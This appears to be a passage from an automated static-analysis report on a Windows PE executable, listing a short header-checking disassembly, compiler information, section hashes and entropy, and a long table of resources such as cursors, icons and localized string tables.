                                                                                                                      mov ecx, dword ptr [eax+3Ch]
                                                                                                                      add ecx, eax
                                                                                                                      cmp dword ptr [ecx], 00004550h
                                                                                                                      jne 00007F747CDEC2E4h
                                                                                                                      movzx eax, word ptr [ecx+18h]
                                                                                                                      cmp eax, 0000010Bh
                                                                                                                      je 00007F747CDEC2F1h
                                                                                                                      cmp eax, 0000020Bh
                                                                                                                      je 00007F747CDEC2D7h
                                                                                                                      mov dword ptr [ebp-1Ch], esi
                                                                                                                      jmp 00007F747CDEC2F9h
                                                                                                                      cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                      jbe 00007F747CDEC2C4h
                                                                                                                      xor eax, eax
                                                                                                                      cmp dword ptr [ecx+000000F8h], esi
                                                                                                                      jmp 00007F747CDEC2E0h
                                                                                                                      cmp dword ptr [ecx+74h], 0Eh
                                                                                                                      jbe 00007F747CDEC2B4h
                                                                                                                      xor eax, eax
                                                                                                                      cmp dword ptr [ecx+000000E8h], esi
                                                                                                                      setne al
                                                                                                                      mov dword ptr [ebp-1Ch], eax
                                                                                                                      Programming Language:
                                                                                                                      • [ASM] VS2003 (.NET) build 3077
                                                                                                                      • [ C ] VS2003 (.NET) build 3077
                                                                                                                      • [C++] VS2003 (.NET) build 3077
                                                                                                                      • [RES] VS2003 (.NET) build 3077
                                                                                                                      • [LNK] VS2003 (.NET) build 3077
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x51b740x104.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x830000x223dd8.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x466000x1c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4ec800x48.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x460000x5f4.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x443a40x4500090bf5d6a9311d62e912522c28783a859False0.5500629812047102data6.578965194074808IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x460000xdc080xe000f035081ac4c7ee86cd6ead176dd1c9bbFalse0.3834228515625data5.2366811213048665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x540000x2e2940x40008313c86e1a2ce269f3aa390bb3074e9bFalse0.2427978515625data2.963596560441913IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x830000x223dd80x22400059bade16f1d8419fc75dee42e8a1822funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_CURSOR0x864400x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                      RT_CURSOR0x865740xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                      RT_CURSOR0x866280x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                      RT_CURSOR0x8675c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                      RT_CURSOR0x868900x134dataEnglishUnited States0.37337662337662336
                                                                                                                      RT_CURSOR0x869c40x134dataEnglishUnited States0.37662337662337664
                                                                                                                      RT_CURSOR0x86af80x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                      RT_CURSOR0x86c2c0x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                      RT_CURSOR0x86d600x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                      RT_CURSOR0x86e940x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                      RT_CURSOR0x86fc80x134dataEnglishUnited States0.44155844155844154
                                                                                                                      RT_CURSOR0x870fc0x134dataEnglishUnited States0.4155844155844156
                                                                                                                      RT_CURSOR0x872300x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                      RT_CURSOR0x873640x134dataEnglishUnited States0.2662337662337662
                                                                                                                      RT_CURSOR0x874980x134dataEnglishUnited States0.2824675324675325
                                                                                                                      RT_CURSOR0x875cc0x134dataEnglishUnited States0.3246753246753247
                                                                                                                      RT_BITMAP0x877000x2e02aDevice independent bitmap graphic, 1472 x 32 x 32, image size 188418, resolution 2834 x 2834 px/m0.2016895011090004
                                                                                                                      RT_BITMAP0xb572c0x42aDevice independent bitmap graphic, 16 x 16 x 32, image size 1026, resolution 2834 x 2834 px/m0.8236397748592871
                                                                                                                      RT_BITMAP0xb5b580x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors0.5701219512195121
                                                                                                                      RT_BITMAP0xb61c00xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                      RT_BITMAP0xb62780x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                      RT_ICON0xb63bc0x44028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.2371665087160047
                                                                                                                      RT_ICON0xfa3e40x45aeaPC bitmap, Windows 3.x format, 36002 x 2 x 37, image size 285759, cbSize 285418, bits offset 540.9950668843590804
                                                                                                                      RT_ICON0x13fed00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishUnited States0.42567567567567566
                                                                                                                      RT_ICON0x13fff80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colorsEnglishUnited States0.260752688172043
                                                                                                                      RT_MENU0x1402e00xe6dataEnglishUnited States0.6304347826086957
                                                                                                                      RT_DIALOG0x1403c80x134dataEnglishUnited States0.5844155844155844
                                                                                                                      RT_DIALOG0x1404fc0xe8dataEnglishUnited States0.6336206896551724
                                                                                                                      RT_STRING0x1405e40x378dataChineseTaiwan0.49436936936936937
                                                                                                                      RT_STRING0x14095c0x896dataCzechCzech Republic0.29754322111010006
                                                                                                                      RT_STRING0x1411f40x914dataDanishDenmark0.2706540447504303
                                                                                                                      RT_STRING0x141b080x9ecdataGermanGermany0.27244094488188975
                                                                                                                      RT_STRING0x1424f40xa74dataGreekGreece0.2705530642750374
                                                                                                                      RT_STRING0x142f680x922dataFinnishFinland0.2523524379811805
                                                                                                                      RT_STRING0x14388c0x95edataFrenchFrance0.25312760633861553
                                                                                                                      RT_STRING0x1441ec0x68adataHebrewIsrael0.3279569892473118
                                                                                                                      RT_STRING0x1448780x8e0dataHungarianHungary0.2953345070422535
                                                                                                                      RT_STRING0x1451580x8e4dataItalianItaly0.2627416520210896
                                                                                                                      RT_STRING0x145a3c0x550dataJapaneseJapan0.35294117647058826
                                                                                                                      RT_STRING0x145f8c0x55cdataKoreanNorth Korea0.39941690962099125
                                                                                                                      RT_STRING0x145f8c0x55cdataKoreanSouth Korea0.39941690962099125
                                                                                                                      RT_STRING0x1464e80x8e6dataDutchNetherlands0.26733977172958734
                                                                                                                      RT_STRING0x146dd00x82adataNorwegianNorway0.26842105263157895
                                                                                                                      RT_STRING0x1475fc0x7eedataPolishPoland0.28374384236453204
                                                                                                                      RT_STRING0x147dec0xa12dataPortugueseBrazil0.24204809930178434
                                                                                                                      RT_STRING0x1488000x7badataRussianRussia0.327098078867543
                                                                                                                      RT_STRING0x148fbc0x8fcdataSwedishSweden0.25478260869565217
                                                                                                                      RT_STRING0x1498b80x7e8dataThaiThailand0.3102766798418972
                                                                                                                      RT_STRING0x14a0a00x3f6dataChineseChina0.48520710059171596
                                                                                                                      RT_STRING0x14a4980x954dataPortuguesePortugal0.26256281407035176
                                                                                                                      RT_STRING0x14adec0x8f2data0.251528384279476
                                                                                                                      RT_STRING0x14b6e00x8fadataEnglishCanada0.24412532637075718
                                                                                                                      RT_STRING0x14bfdc0x21cdataChineseTaiwan0.6444444444444445
                                                                                                                      RT_STRING0x14c1f80x3eadataCzechCzech Republic0.4431137724550898
                                                                                                                      RT_STRING0x14c5e40x41edataDanishDenmark0.3984819734345351
                                                                                                                      RT_STRING0x14ca040x512AmigaOS bitmap font "o", fc_YSize 25344, 17920 elements, 2nd " ", 3rd "e"GermanGermany0.362095531587057
                                                                                                                      RT_STRING0x14cf180x482dataGreekGreece0.44280762564991333
                                                                                                                      RT_STRING0x14d39c0x504dataFinnishFinland0.3598130841121495
                                                                                                                      RT_STRING0x14d8a00x4b6dataFrenchFrance0.3548922056384743
                                                                                                                      RT_STRING0x14dd580x384dataHebrewIsrael0.4588888888888889
                                                                                                                      RT_STRING0x14e0dc0x466dataHungarianHungary0.42362344582593253
                                                                                                                      RT_STRING0x14e5440x43cdataItalianItaly0.3966789667896679
                                                                                                                      RT_STRING0x14e9800x22edataJapaneseJapan0.6164874551971327
                                                                                                                      RT_STRING0x14ebb00x240dataKoreanNorth Korea0.6388888888888888
                                                                                                                      RT_STRING0x14ebb00x240dataKoreanSouth Korea0.6388888888888888
                                                                                                                      RT_STRING0x14edf00x4e2dataDutchNetherlands0.3424
                                                                                                                      RT_STRING0x14f2d40x3e0AmigaOS bitmap font "v", fc_YSize 28416, 16640 elements, 2nd "i", 3rd "e"NorwegianNorway0.4112903225806452
                                                                                                                      RT_STRING0x14f6b40x4acdataPolishPoland0.4080267558528428
                                                                                                                      RT_STRING0x14fb600x4b0dataPortugueseBrazil0.3858333333333333
                                                                                                                      RT_STRING0x1500100x5c8dataRussianRussia0.36824324324324326
                                                                                                                      RT_STRING0x1505d80x41edataSwedishSweden0.3776091081593928
                                                                                                                      RT_STRING0x1509f80x362dataThaiThailand0.46882217090069284
                                                                                                                      RT_STRING0x150d5c0x1eadataChineseChina0.7306122448979592
                                                                                                                      RT_STRING0x150f480x4a6dataPortuguesePortugal0.3815126050420168
                                                                                                                      RT_STRING0x1513f00x4ecAmigaOS bitmap font "s", fc_YSize 24832, 21760 elements, 2nd "c", 3rd "q"0.3753968253968254
                                                                                                                      RT_STRING0x1518dc0x3b0dataEnglishCanada0.4014830508474576
                                                                                                                      RT_STRING0x151c8c0x2c8dataChineseTaiwan0.7780898876404494
                                                                                                                      RT_STRING0x151f540x6c2dataCzechCzech Republic0.4028901734104046
                                                                                                                      RT_STRING0x1526180x7ecdataDanishDenmark0.35552268244575935
                                                                                                                      RT_STRING0x152e040x8c8dataGermanGermany0.33629893238434166
                                                                                                                      RT_STRING0x1536cc0x926AmigaOS bitmap font "\301\003\255\003\307\003\277\003\275\003 ", fc_YSize 4294948611, 41987 elementsGreekGreece0.3736122971818958
                                                                                                                      RT_STRING0x153ff40x6a8dataFinnishFinland0.3826291079812207
                                                                                                                      RT_STRING0x15469c0x818dataFrenchFrance0.3359073359073359
                                                                                                                      RT_STRING0x154eb40x6e0dataHebrewIsrael0.38238636363636364
                                                                                                                      RT_STRING0x1555940x750AmigaOS bitmap font "k", fc_YSize 11520, 16640 elements, 2nd " ", 3rd "l"HungarianHungary0.38514957264957267
                                                                                                                      RT_STRING0x155ce40x7b6dataItalianItaly0.34903748733535966
                                                                                                                      RT_STRING0x15649c0x3e4dataJapaneseJapan0.5783132530120482
                                                                                                                      RT_STRING0x1568800x44cdataKoreanNorth Korea0.5636363636363636
                                                                                                                      RT_STRING0x1568800x44cdataKoreanSouth Korea0.5636363636363636
                                                                                                                      RT_STRING0x156ccc0x820dataDutchNetherlands0.33557692307692305
                                                                                                                      RT_STRING0x1574ec0x742AmigaOS bitmap font "j", fc_YSize 30208, 18176 elements, 2nd "r", 3rd "e"NorwegianNorway0.34607104413347684
                                                                                                                      RT_STRING0x157c300x728dataPolishPoland0.384825327510917
                                                                                                                      RT_STRING0x1583580x84cdataPortugueseBrazil0.3422787193973635
                                                                                                                      RT_STRING0x158ba40x6f2dataRussianRussia0.3914510686164229
                                                                                                                      RT_STRING0x1592980x7b6AmigaOS bitmap font "u", fc_YSize 8192, 19968 elements, 2nd "v", 3rd "e"SwedishSweden0.3601823708206687
                                                                                                                      RT_STRING0x159a500x658dataThaiThailand0.42549261083743845
                                                                                                                      RT_STRING0x15a0a80x2e0dataChineseChina0.751358695652174
                                                                                                                      RT_STRING0x15a3880x770dataPortuguesePortugal0.34558823529411764
                                                                                                                      RT_STRING0x15aaf80x7b0AmigaOS bitmap font "r", fc_YSize 25856, 16640 elements, 2nd "D", 3rd "e"0.3475609756097561
                                                                                                                      RT_STRING0x15b2a80x7b6dataEnglishCanada0.3454913880445795
                                                                                                                      RT_STRING0x15ba600x2d6dataChineseTaiwan0.7851239669421488
                                                                                                                      RT_STRING0x15bd380x64adataCzechCzech Republic0.45217391304347826
                                                                                                                      RT_STRING0x15c3840x66cdataDanishDenmark0.40450121654501214
                                                                                                                      RT_STRING0x15c9f00x6e0Dyalog APL aplcore version 66.0GermanGermany0.4017045454545455
                                                                                                                      RT_STRING0x15d0d00x718OpenPGP Secret KeyGreekGreece0.43061674008810574
                                                                                                                      RT_STRING0x15d7e80x63edataFinnishFinland0.4123904881101377
                                                                                                                      RT_STRING0x15de280x65edataFrenchFrance0.4147239263803681
                                                                                                                      RT_STRING0x15e4880x5c4dataHebrewIsrael0.45799457994579945
                                                                                                                      RT_STRING0x15ea4c0x5b0dataHungarianHungary0.45879120879120877
                                                                                                                      RT_STRING0x15effc0x67cdataItalianItaly0.41566265060240964
                                                                                                                      RT_STRING0x15f6780x36adataJapaneseJapan0.6601830663615561
                                                                                                                      RT_STRING0x15f9e40x380dataKoreanNorth Korea0.6662946428571429
                                                                                                                      RT_STRING0x15f9e40x380dataKoreanSouth Korea0.6662946428571429
                                                                                                                      RT_STRING0x15fd640x6c0dataDutchNetherlands0.3894675925925926
                                                                                                                      RT_STRING0x1604240x63adataNorwegianNorway0.397741530740276
                                                                                                                      RT_STRING0x160a600x5d0dataPolishPoland0.4536290322580645
                                                                                                                      RT_STRING0x1610300x66adataPortugueseBrazil0.4287454323995128
                                                                                                                      RT_STRING0x16169c0x550dataRussianRussia0.4625
                                                                                                                      RT_STRING0x161bec0x60edataSwedishSweden0.4096774193548387
                                                                                                                      RT_STRING0x1621fc0x500dataThaiThailand0.5046875
                                                                                                                      RT_STRING0x1626fc0x2c8dataChineseChina0.827247191011236
                                                                                                                      RT_STRING0x1629c40x608OpenPGP Secret KeyPortuguesePortugal0.4216321243523316
                                                                                                                      RT_STRING0x162fcc0x664OpenPGP Secret Key0.41503667481662593
                                                                                                                      RT_STRING0x1636300x5daDOS executable (COM, 0x8C-variant)EnglishCanada0.4205607476635514
                                                                                                                      RT_STRING0x163c0c0x340AmigaOS bitmap font "~v.zMQ\273\214\013N\011\217\204v", fc_YSize 8192, 2638 elements, 2nd "-\212\356v\004\223\014", 3rd "d"ChineseTaiwan0.6358173076923077
                                                                                                                      RT_STRING0x163f4c0x6f8dataCzechCzech Republic0.36154708520179374
                                                                                                                      RT_STRING0x1646440x74cdataDanishDenmark0.3329764453961456
                                                                                                                      RT_STRING0x164d900x802dataGermanGermany0.3326829268292683
                                                                                                                      RT_STRING0x1655940x908dataGreekGreece0.3672145328719723
                                                                                                                      RT_STRING0x165e9c0x77edataFinnishFinland0.35662148070907196
                                                                                                                      RT_STRING0x16661c0x842dataFrenchFrance0.33349101229895933
                                                                                                                      RT_STRING0x166e600x626dataHebrewIsrael0.40088945362134687
                                                                                                                      RT_STRING0x1674880x72adataHungarianHungary0.36150490730643403
                                                                                                                      RT_STRING0x167bb40x7b8dataItalianItaly0.3350202429149798
                                                                                                                      RT_STRING0x16836c0x456dataJapaneseJapan0.4846846846846847
                                                                                                                      RT_STRING0x1687c40x45adataKoreanNorth Korea0.5197486535008977
                                                                                                                      RT_STRING0x1687c40x45adataKoreanSouth Korea0.5197486535008977
                                                                                                                      RT_STRING0x168c200x7cedataDutchNetherlands0.3308308308308308
                                                                                                                      RT_STRING0x1693f00x7a6dataNorwegianNorway0.3202247191011236
                                                                                                                      RT_STRING0x169b980x698dataPolishPoland0.36729857819905215
                                                                                                                      RT_STRING0x16a2300x85cdataPortugueseBrazil0.31822429906542055
                                                                                                                      RT_STRING0x16aa8c0x6b0dataRussianRussia0.3679906542056075
                                                                                                                      RT_STRING0x16b13c0x6dedataSwedishSweden0.34186575654152446
                                                                                                                      RT_STRING0x16b81c0x636dataThaiThailand0.3855345911949686
                                                                                                                      RT_STRING0x16be540x346dataChineseChina0.636038186157518
                                                                                                                      RT_STRING0x16c19c0x7dedataPortuguesePortugal0.32621648460774577
                                                                                                                      RT_STRING0x16c97c0x73cdata0.3250539956803456
                                                                                                                      RT_STRING0x16d0b80x74cdataEnglishCanada0.3217344753747323
                                                                                                                      RT_STRING0x16d8040x46edataChineseTaiwan0.599647266313933
                                                                                                                      RT_STRING0x16dc740x7b8dataCzechCzech Republic0.4185222672064777
                                                                                                                      RT_STRING0x16e42c0x82adataDanishDenmark0.3736842105263158
                                                                                                                      RT_STRING0x16ec580x868dataGermanGermany0.3712825278810409
                                                                                                                      RT_STRING0x16f4c00x966dataGreekGreece0.39276807980049877
                                                                                                                      RT_STRING0x16fe280x954dataFinnishFinland0.36139028475711893
                                                                                                                      RT_STRING0x17077c0x94cPDP-11 demand-paged pure executable not strippedFrenchFrance0.36512605042016805
                                                                                                                      RT_STRING0x1710c80x728dataHebrewIsrael0.4170305676855895
                                                                                                                      RT_STRING0x1717f00x7f8dataHungarianHungary0.3877450980392157
                                                                                                                      RT_STRING0x171fe80x86adataItalianItaly0.37418755803156917
                                                                                                                      RT_STRING0x1728540x53edataJapaneseJapan0.5104321907600596
                                                                                                                      RT_STRING0x172d940x5aedataKoreanNorth Korea0.5281980742778541
                                                                                                                      RT_STRING0x172d940x5aedataKoreanSouth Korea0.5281980742778541
                                                                                                                      RT_STRING0x1733440x878dataDutchNetherlands0.3519372693726937
                                                                                                                      RT_STRING0x173bbc0x7a4dataNorwegianNorway0.37678936605316976
                                                                                                                      RT_STRING0x1743600x85adataPolishPoland0.3985032740879326
                                                                                                                      RT_STRING0x174bbc0x8eedataPortugueseBrazil0.36832895888014
                                                                                                                      RT_STRING0x1754ac0x83adataRussianRussia0.4107312440645774
                                                                                                                      RT_STRING0x175ce80x7fadataSwedishSweden0.38050930460333005
                                                                                                                      RT_STRING0x1764e40x738dataThaiThailand0.42045454545454547
                                                                                                                      RT_STRING0x176c1c0x482dataChineseChina0.6091854419410745
                                                                                                                      RT_STRING0x1770a00x81adataPortuguesePortugal0.3799421407907425
                                                                                                                      RT_STRING0x1778bc0x858data0.38436329588014984
                                                                                                                      RT_STRING0x1781140x7badataEnglishCanada0.3822042467138524
                                                                                                                      RT_STRING0x1788d00x38dataChineseTaiwan0.6428571428571429
                                                                                                                      RT_STRING0x1789080x56dataCzechCzech Republic0.6511627906976745
                                                                                                                      RT_STRING0x1789600x5edataDanishDenmark0.6382978723404256
                                                                                                                      RT_STRING0x1789c00x56dataGermanGermany0.686046511627907
                                                                                                                      RT_STRING0x178a180x5adataGreekGreece0.7222222222222222
                                                                                                                      RT_STRING0x178a740x5edataFinnishFinland0.6382978723404256
                                                                                                                      RT_STRING0x178ad40x5adataFrenchFrance0.6444444444444445
                                                                                                                      RT_STRING0x178b300x46dataHebrewIsrael0.7
                                                                                                                      RT_STRING0x178b780x52dataHungarianHungary0.6341463414634146
                                                                                                                      RT_STRING0x178bcc0x62dataItalianItaly0.6122448979591837
                                                                                                                      RT_STRING0x178c300x44dataJapaneseJapan0.6911764705882353
                                                                                                                      RT_STRING0x178c740x3cdataKoreanNorth Korea0.65
                                                                                                                      RT_STRING0x178c740x3cdataKoreanSouth Korea0.65
                                                                                                                      RT_STRING0x178cb00x56dataDutchNetherlands0.6744186046511628
                                                                                                                      RT_STRING0x178d080x68dataNorwegianNorway0.6826923076923077
                                                                                                                      RT_STRING0x178d700x96dataPolishPoland0.6466666666666666
                                                                                                                      RT_STRING0x178e080x5cdataPortugueseBrazil0.6630434782608695
                                                                                                                      RT_STRING0x178e640x3cdataRussianRussia0.6333333333333333
                                                                                                                      RT_STRING0x178ea00x5adataSwedishSweden0.6555555555555556
                                                                                                                      RT_STRING0x178efc0x48dataThaiThailand0.6527777777777778
                                                                                                                      RT_STRING0x178f440x3adataChineseChina0.6551724137931034
                                                                                                                      RT_STRING0x178f800x52dataPortuguesePortugal0.6707317073170732
                                                                                                                      RT_STRING0x178fd40x5cdata0.6630434782608695
                                                                                                                      RT_STRING0x1790300x4adataEnglishCanada0.6621621621621622
                                                                                                                      RT_STRING0x17907c0x298dataChineseTaiwan0.713855421686747
                                                                                                                      RT_STRING0x1793140x718dataCzechCzech Republic0.3601321585903084
                                                                                                                      RT_STRING0x179a2c0x7a8dataDanishDenmark0.3153061224489796
                                                                                                                      RT_STRING0x17a1d40x884dataGermanGermany0.31238532110091743
                                                                                                                      RT_STRING0x17aa580x820dataGreekGreece0.33028846153846153
                                                                                                                      RT_STRING0x17b2780x7e0dataFinnishFinland0.3060515873015873
                                                                                                                      RT_STRING0x17ba580x86adataFrenchFrance0.3138347260909935
                                                                                                                      RT_STRING0x17c2c40x5e0dataHebrewIsrael0.3696808510638298
                                                                                                                      RT_STRING0x17c8a40x718dataHungarianHungary0.3419603524229075
                                                                                                                      RT_STRING0x17cfbc0x810dataItalianItaly0.29651162790697677
                                                                                                                      RT_STRING0x17d7cc0x442dataJapaneseJapan0.5376146788990825
                                                                                                                      RT_STRING0x17dc100x456dataKoreanNorth Korea0.554954954954955
                                                                                                                      RT_STRING0x17dc100x456dataKoreanSouth Korea0.554954954954955
                                                                                                                      RT_STRING0x17e0680x798dataDutchNetherlands0.3045267489711934
                                                                                                                      RT_STRING0x17e8000x6e8dataNorwegianNorway0.3173076923076923
                                                                                                                      RT_STRING0x17eee80x7b0dataPolishPoland0.3429878048780488
                                                                                                                      RT_STRING0x17f6980x7eadataPortugueseBrazil0.31539980256663375
                                                                                                                      RT_STRING0x17fe840x710dataRussianRussia0.3495575221238938
                                                                                                                      RT_STRING0x1805940x734dataSwedishSweden0.3297180043383948
                                                                                                                      RT_STRING0x180cc80x5e8dataThaiThailand0.37037037037037035
                                                                                                                      RT_STRING0x1812b00x27cdataChineseChina0.6965408805031447
                                                                                                                      RT_STRING0x18152c0x836dataPortuguesePortugal0.30209324452902
                                                                                                                      RT_STRING0x181d640x8a0data0.3016304347826087
                                                                                                                      RT_STRING0x1826040x77edataEnglishCanada0.30552659019812306
                                                                                                                      RT_STRING0x182d840xaedataChineseTaiwan0.8908045977011494
                                                                                                                      RT_STRING0x182e340x1feOpenPGP Public KeyCzechCzech Republic0.515686274509804
                                                                                                                      RT_STRING0x1830340x222PGP Secret Sub-key -DanishDenmark0.43956043956043955
                                                                                                                      RT_STRING0x1832580x278dataGermanGermany0.4272151898734177
                                                                                                                      RT_STRING0x1834d00x244dataGreekGreece0.4793103448275862
                                                                                                                      RT_STRING0x1837140x1dedataFinnishFinland0.4707112970711297
                                                                                                                      RT_STRING0x1838f40x230dataFrenchFrance0.4714285714285714
                                                                                                                      RT_STRING0x183b240x170dataHebrewIsrael0.5081521739130435
                                                                                                                      RT_STRING0x183c940x248dataHungarianHungary0.4948630136986301
                                                                                                                      RT_STRING0x183edc0x24cdataItalianItaly0.42857142857142855
                                                                                                                      RT_STRING0x1841280x108dataJapaneseJapan0.8068181818181818
                                                                                                                      RT_STRING0x1842300x122dataKoreanNorth Korea0.7344827586206897
                                                                                                                      RT_STRING0x1842300x122dataKoreanSouth Korea0.7344827586206897
                                                                                                                      RT_STRING0x1843540x270dataDutchNetherlands0.42788461538461536
                                                                                                                      RT_STRING0x1845c40x1ecdataNorwegianNorway0.45934959349593496
                                                                                                                      RT_STRING0x1847b00x208OpenPGP Public KeyPolishPoland0.5115384615384615
                                                                                                                      RT_STRING0x1849b80x242dataPortugueseBrazil0.4429065743944637
                                                                                                                      RT_STRING0x184bfc0x1e6dataRussianRussia0.4876543209876543
                                                                                                                      RT_STRING0x184de40x21eOpenPGP Secret KeySwedishSweden0.44280442804428044
                                                                                                                      RT_STRING0x1850040x1b4dataThaiThailand0.5779816513761468
                                                                                                                      RT_STRING0x1851b80xa8dataChineseChina0.8690476190476191
                                                                                                                      RT_STRING0x1852600x254dataPortuguesePortugal0.4513422818791946
                                                                                                                      RT_STRING0x1854b40x216OpenPGP Secret Key0.46254681647940077
                                                                                                                      RT_STRING0x1856cc0x21cdataEnglishCanada0.45
                                                                                                                      RT_STRING0x1858e80x3adataChineseTaiwan0.6379310344827587
                                                                                                                      RT_STRING0x1859240x3adataCzechCzech Republic0.6379310344827587
                                                                                                                      RT_STRING0x1859600x3adataDanishDenmark0.6379310344827587
                                                                                                                      RT_STRING0x18599c0x3adataGermanGermany0.6379310344827587
                                                                                                                      RT_STRING0x1859d80x3adataGreekGreece0.6379310344827587
                                                                                                                      RT_STRING0x185a140x3adataFinnishFinland0.6379310344827587
                                                                                                                      RT_STRING0x185a500x3adataFrenchFrance0.6379310344827587
                                                                                                                      RT_STRING0x185a8c0x3adataHebrewIsrael0.6379310344827587
                                                                                                                      RT_STRING0x185ac80x3adataHungarianHungary0.6379310344827587
                                                                                                                      RT_STRING0x185b040x3adataItalianItaly0.6379310344827587
                                                                                                                      RT_STRING0x185b400x3adataJapaneseJapan0.6379310344827587
                                                                                                                      RT_STRING0x185b7c0x3adataKoreanNorth Korea0.6379310344827587
                                                                                                                      RT_STRING0x185b7c0x3adataKoreanSouth Korea0.6379310344827587
                                                                                                                      RT_STRING0x185bb80x3adataDutchNetherlands0.6379310344827587
                                                                                                                      RT_STRING0x185bf40x3adataNorwegianNorway0.6379310344827587
                                                                                                                      RT_STRING0x185c300x3adataPolishPoland0.6379310344827587
                                                                                                                      RT_STRING0x185c6c0x3adataPortugueseBrazil0.6379310344827587
                                                                                                                      RT_STRING0x185ca80x3adataRussianRussia0.6379310344827587
                                                                                                                      RT_STRING0x185ce40x3adataSwedishSweden0.6379310344827587
                                                                                                                      RT_STRING0x185d200x3adataThaiThailand0.6379310344827587
                                                                                                                      RT_STRING0x185d5c0x3adataChineseChina0.6379310344827587
                                                                                                                      RT_STRING0x185d980x3adataPortuguesePortugal0.6379310344827587
                                                                                                                      RT_STRING0x185dd40x3adata0.6379310344827587
                                                                                                                      RT_STRING0x185e100x3adataEnglishCanada0.6379310344827587
                                                                                                                      RT_STRING0x185e4c0x328dataChineseTaiwan0.34405940594059403
                                                                                                                      RT_STRING0x1861740x328dataCzechCzech Republic0.34405940594059403
                                                                                                                      RT_STRING0x18649c0x328dataDanishDenmark0.34405940594059403
                                                                                                                      RT_STRING0x1867c40x328dataGermanGermany0.34405940594059403
                                                                                                                      RT_STRING0x186aec0x328dataGreekGreece0.34405940594059403
                                                                                                                      RT_STRING0x186e140x328dataFinnishFinland0.34405940594059403
                                                                                                                      RT_STRING0x18713c0x328dataFrenchFrance0.34405940594059403
                                                                                                                      RT_STRING0x1874640x328dataHebrewIsrael0.34405940594059403
                                                                                                                      RT_STRING0x18778c0x328dataHungarianHungary0.34405940594059403
                                                                                                                      RT_STRING0x187ab40x328dataItalianItaly0.34405940594059403
                                                                                                                      RT_STRING0x187ddc0x328dataJapaneseJapan0.34405940594059403
                                                                                                                      RT_STRING0x1881040x328dataKoreanNorth Korea0.34405940594059403
                                                                                                                      RT_STRING0x1881040x328dataKoreanSouth Korea0.34405940594059403
                                                                                                                      RT_STRING0x18842c0x328dataDutchNetherlands0.34405940594059403
                                                                                                                      RT_STRING0x1887540x328dataNorwegianNorway0.34405940594059403
                                                                                                                      RT_STRING0x188a7c0x328dataPolishPoland0.34405940594059403
                                                                                                                      RT_STRING0x188da40x328dataPortugueseBrazil0.34405940594059403
                                                                                                                      RT_STRING0x1890cc0x328dataRussianRussia0.34405940594059403
                                                                                                                      RT_STRING0x1893f40x328dataSwedishSweden0.34405940594059403
                                                                                                                      RT_STRING0x18971c0x328dataThaiThailand0.34405940594059403
                                                                                                                      RT_STRING0x189a440x328dataChineseChina0.34405940594059403
                                                                                                                      RT_STRING0x189d6c0x328dataPortuguesePortugal0.34405940594059403
